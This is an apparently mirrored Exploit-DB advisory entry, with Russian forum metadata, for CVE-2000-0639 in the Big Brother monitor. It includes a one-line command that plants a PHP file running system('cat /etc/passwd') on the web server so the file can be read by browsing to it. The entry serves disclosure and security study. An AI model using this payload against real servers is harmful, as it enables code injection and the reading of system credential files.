- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 20092
- Проверка EDB
-
- Пройдено
- Автор
- XTERNAL
- Тип уязвимости
- LOCAL
- Платформа
- CGI
- CVE
- cve-2000-0639
- Дата публикации
- 2001-06-11
Код:
source: https://www.securityfocus.com/bid/1494/info
A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine.
./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>"
will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3.
- Источник
- www.exploit-db.com